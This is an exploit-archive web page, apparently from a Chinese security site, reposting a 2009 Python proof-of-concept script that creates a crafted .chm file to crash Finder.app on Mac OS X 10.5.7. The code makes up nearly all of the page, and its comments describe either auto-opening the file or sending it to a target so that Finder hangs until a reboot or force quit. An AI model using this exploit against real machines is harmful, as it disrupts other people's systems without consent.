首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X 10.5.7 (.CHM File) Local Finder.app Denial of Service Exploit
来源:www.vfcocus.net 作者:Dr_IDE 发布时间:2009-08-10  

#!/usr/bin/env python

import os;

print """
###############################################################################
#               #
# Mac OS X 10.5.7 Local Finder.app DoS (.CHM)                        #
# By: Dr_IDE and s0kket                 #
# Greets to offsec                                                            #
# Tested on OS X 10.5.7 (This will most likely kill more than this version.   #
#                     #
###############################################################################
\n""";

fname = (raw_input(" [*] Enter the filename you would like to create:"));
print " [*] Creating Evil .CHM file...";

try:
 f1 = open(fname + '.chm','w');
 f1.write("#################################################\n");
 f1.write("#                                               #\n");
 f1.write("# OSX 10.5.7(X?) Local Finder.app DoS (.CHM)    #\n");
 f1.write("# By: Dr_IDE and s0kket.                        #\n");         
 f1.write("# Greets to offsec.                             #\n");
 f1.write("# It really shouldn't be this easy...           #\n");
 f1.write("#                                               #\n");
 f1.write("#################################################\n\n");
 f1.close();

 print " [*] Payload has been created.";
 print " [*] If the user opens the payload with Finder they won't be happy.";

 #
 # There are two options for this attack:
 # 1.) You can choose to automagically open the chm finder.
 # As long as a VMware/Parallels isn't installed then finder is
 # the default app for this extension.
 #
 # 2.) We will just create file and send it/upload it to the target.
 #
 # Note: Only uncomment one of these lines at a time.
 #
 
 # This will mess up the system pretty bad, only way out is
 # reboot or force quit of Finder.app
 #x = os.system('open ' + fname + '.chm');
 
 # This will create the offending .chm file and quit.
 x = raw_input(" [*] Press Enter to Quit.");

except:
 print "Error."


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MediaCoder 0.7.1.4488 (.lst &
·The Huawei MT880 device suffer
·iRehearse (.m3u File) Local Bu
·Pico MP3 Player version 1.0 cr
·FoxPlayer 1.1.0 (m3u File) Loc
·ImTOO MPEG Encoder 3.1.53 (.cu
·Arab Portal 2.2 (Auth Bypass)
·Groovy Media Player 1.2.0 (.m3
·Joomla Component com_pms 2.0.4
·Playlistmaker 1.5 (.M3U/M3L Fi
·Spiceworks 3.6 Accept Paramete
·A2 Media Player Pro 2.51 (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved